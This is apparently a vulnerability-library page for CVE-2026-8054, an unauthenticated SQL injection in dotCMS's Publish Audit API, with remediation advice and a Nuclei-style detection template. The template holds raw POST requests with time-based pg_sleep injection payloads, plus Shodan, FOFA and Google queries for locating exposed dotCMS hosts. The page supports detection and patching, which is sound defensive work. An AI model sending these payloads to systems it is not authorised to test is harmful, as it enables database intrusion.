/Vulnerability Library

dotCMS Core Publish Audit API - Unauthenticated SQL Injection

CVE-2026-8054
Verified

Description

dotCMS Core 25.11.04-1 through 26.04.28-02 contains an SQL injection caused by unsanitized input in Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll), letting remote unauthenticated attackers read, modify, or destroy arbitrary database content, exploit requires no authentication.

Severity

Critical

Affected Product

dotcms

Published Date

June 9, 2026

Template Author

dhiyaneshdk

CVE-2026-8054.yaml
id: CVE-2026-8054

info:
  name: dotCMS Core Publish Audit API - Unauthenticated SQL Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    dotCMS Core 25.11.04-1 through 26.04.28-02 contains an SQL injection caused by unsanitized input in Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll), letting remote unauthenticated attackers read, modify, or destroy arbitrary database content, exploit requires no authentication.
  impact: |
    Remote attackers can read, modify, or destroy arbitrary database content, potentially compromising the entire database.
  remediation: |
    Upgrade to dotCMS Core 26.04.28-03 or later.
  reference:
    - https://github.com/advisories/GHSA-jpx3-25r2-jq5g
    - https://github.com/dotCMS/core/pull/35553
    - https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-75
  metadata:
    max-request: 2
    vendor: dotcms
    product: dotcms
    shodan-query: http.title:"dotcms"
    fofa-query: title="dotcms"
    google-query: intitle:"dotcms"
  tags: cve,cve2026,dotcms,sqli,unauth,time-based,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/auditPublishing/getAll HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["x' || (SELECT CASE WHEN 1=2 THEN pg_sleep(0)::text ELSE '' END) || '"]

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type, 'application/json')"
          - "contains(body, '[]')"
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /api/auditPublishing/getAll HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        ["x' || (SELECT CASE WHEN 1=1 THEN pg_sleep(5)::text ELSE '' END) || '"]

    matchers:
      - type: dsl
        dsl:
          - "duration>=5"
          - "status_code == 200"
          - "contains(content_type, 'application/json')"
          - "contains(body, '[]')"
        condition: and
# digest: 4a0a0047304502206353978d3f1babdbe78c719242ffd86344e79159433b089fabad34084f1ac8bc022100a3ddda615cad914cbb269bca5694a0aa29e5be38745a7d7d8c50b81e2f9a5f59:922c64590222798bb761d5b6d8e72950
9.5Severity

CVSS Metrics

References

https://github.com/advisories/GHSA-jpx3-25r2-jq5ghttps://github.com/dotCMS/core/pull/35553https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-75

Remediation Steps

Upgrade to dotCMS Core 26.04.28-03 or later.